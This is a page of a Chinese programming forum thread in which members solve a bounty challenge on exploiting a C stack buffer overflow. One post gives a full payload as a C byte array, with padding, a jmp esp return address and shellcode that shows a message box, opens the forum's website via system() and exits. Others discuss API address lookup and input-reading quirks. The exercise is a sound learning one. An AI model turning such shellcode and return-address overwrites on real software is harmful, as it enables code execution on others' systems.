Sì曾相識♂ 发表于 2012-8-9 14:39:48

竟然被人抢先了一部,想搞懂这个的,建议出看一下看雪论坛出品的书《0Day安全:软件漏洞分析技术》。甲鱼兄,我说的没错把,嘿嘿~

五月跳回家 发表于 2012-8-9 14:52:06

小甲鱼 发表于 2012-8-8 22:49 static/image/common/back.gif
算算难度好像没那么大,所以改200鱼币~

200鱼币这活动还有么,我写好了

小甲鱼 发表于 2012-8-9 15:04:45

五月跳回家 发表于 2012-8-9 14:52 static/image/common/back.gif
200鱼币这活动还有么,我写好了

{:5_105:}哟西,有的,把答案和具体的思路提交下即可哦~真不错~

小甲鱼 发表于 2012-8-9 15:05:10

Sì曾相識♂ 发表于 2012-8-9 14:39 static/image/common/back.gif
竟然被人抢先了一部,想搞懂这个的,建议出看一下看雪论坛出品的书《0Day安全:软件漏洞分析技术》。甲鱼兄 ...

{:5_109:}嗯嗯,多次推荐,非常不错的一本入门书籍~

By、小雨(zy) 发表于 2012-8-9 15:07:30

:lol看看:lol:lol:lol:lol

五月跳回家 发表于 2012-8-9 15:07:33

本帖最后由 五月跳回家 于 2012-8-9 15:09 编辑

小甲鱼 发表于 2012-8-9 15:04 http://bbs.fishc.com/static/image/common/back.gif
哟西,有的,把答案和具体的思路提交下即可哦~真不错~给shellcode吧

char password[]=
"a\x41\x41\x41"
"\x66\x69\x73\x68"


"\x66\x69\x73\x68"//前面填充80个字节栈
"\x12\x45\xfa\x7f"//jmp esp(原eip)
//MessageBoxA;
"\x33\xDB\x53"//xor ebx,ebx
"\x68\x63\x6F\x6D\x21"//push    216D6F63
"\x68\x73\x68\x63\x2E"
"\x68\x6F\x5F\x66\x69"
"\x68\x6D\x65\x5F\x74"
"\x68\x65\x6C\x63\x6F"//push    6F636C65
"\x68\x5E\x5F\x5E\x77"//push    775E5F5E//ascii ^_^welcome_to_fishc.com!
"\x8B\xC4"//mov   eax, esp
"\x53"//push    ebx
"\x50"
"\x50"//push    eax
"\x53"
"\xB8\x11\xEA\x34\x75"//mov eax,0x7534EA11 ;我电脑上MessageBoxA的地址
"\xFF\xD0"//call eax
//system("start www.fishc.com");

"\x55"                                        //push    ebp
"\x8B\xEC"                              //mov   ebp, esp
"\x83\xEC\x20"                        //sub   esp, 20
"\xB8\x73\x74\x61\x72"      //mov   eax, 72617473
"\x89\x45\xE4"                        //mov   dword ptr , eax
"\xB8\x74\x20\x77\x77"      //www.fishc.com
"\x89\x45\xE8"                        
"\xB8\x77\x2E\x66\x69"      
"\x89\x45\xEC"                        //....
"\xB8\x73\x68\x63\x2E"      //....
"\x89\x45\xF0"                        //....
"\x66\xC7\x45\xF4\x63\x6F"
"\xC6\x45\xF6\x6D"
"\x33\xC0"                              //xor   eax, eax
"\x88\x45\xF7"                        
"\x8D\x7D\xE4"                        
"\x57"                                       
"\xBA\x77\xB1\x4C\x75"      //system地址
"\xFF\xD2"                              //call    edx ;
//ExitProcess(0);
"\x53"//push      ebx
"\xB8\xE2\xBB\xAC\x75"//mov   eax,75ACBBE2   ;ExitProcess
"\xFF\xD0";                        //call eax;*/

向往 发表于 2012-8-9 15:31:29

{:5_100:}表示不懂

五月跳回家 发表于 2012-8-9 16:06:12

Sì曾相識♂ 发表于 2012-8-9 14:39 static/image/common/back.gif
竟然被人抢先了一部,想搞懂这个的,建议出看一下看雪论坛出品的书《0Day安全:软件漏洞分析技术》。甲鱼兄 ...

{:5_109:}昨天通宵刷的{:5_109:}

骗子死全家 发表于 2012-8-9 16:22:18

新人没那么高技术

小甲鱼 发表于 2012-8-9 16:39:23

五月跳回家 发表于 2012-8-9 16:06 static/image/common/back.gif
昨天通宵刷的

{:5_95:}看来还是酱紫的模式比较促进学习哈~

学基础 发表于 2012-8-9 16:58:39

先看看,现在还不懂

Tzdner_C 发表于 2012-8-9 17:39:49

五月跳回家 发表于 2012-8-8 22:15 static/image/common/back.gif
shellcode

可以用 GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA");   把这个也写进文件里面,只是有些麻烦,不过就可以动态获取MessageaboxA的地址了

五月跳回家 发表于 2012-8-9 17:45:16

小甲鱼 发表于 2012-8-9 16:39 static/image/common/back.gif
看来还是酱紫的模式比较促进学习哈~

{:5_100:}甲鱼哥,我打开那网站使用system("start www.fishc.com");来的,中间有个空格,我那个纠结啊{:5_107:}
后来才想到fscanf( fp, "%s", password );来读读到空格就结束了,它就不读了,肏{:5_100:}程序崩溃,你把
fscanf( fp, "%s", password );改成fgets(password,1024,fp);吧,就当降低难度

小甲鱼 发表于 2012-8-9 17:54:19

五月跳回家 发表于 2012-8-9 17:45 static/image/common/back.gif
甲鱼哥,我打开那网站使用system("start www.fishc.com");来的,中间有个空格,我那个纠结啊{:5_ ...

{:5_104:}思路正确即可,打开网址可以用其他函数哦。

五月跳回家 发表于 2012-8-9 17:54:52

Tzdner_C 发表于 2012-8-9 17:39 static/image/common/back.gif
可以用 GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA");   把这个也写进文件里面,只是有些麻 ...

LoadLibraryA的地址貌似也不同

蔡小小鸿 发表于 2012-8-9 18:21:30

来晚一步,这个和之前做的一模一样,应该是0day那本书上的例子吧。

好像天亮了 发表于 2012-8-9 19:20:34

看下。要求10字字字字字字字字字字字字字字

pkwangxinjun 发表于 2012-8-9 21:20:55

这个以前学习过,再来看看

Tzdner_C 发表于 2012-8-9 22:18:06

五月跳回家 发表于 2012-8-9 17:54 static/image/common/back.gif
LoadLibraryA的地址貌似也不同

:handshake疏忽了,这就成了先有鸡先有蛋的问题了。。。

没个正样 发表于 2012-8-10 03:36:58

此题目是够标新立异的,但是在缓冲区溢出实际应用中可没有这么简单!
页: 1 2 3 [4] 5 6 7
查看完整版本: 悬赏一百鱼币,大家一起学习C语言溢出漏洞的利用,有木有?!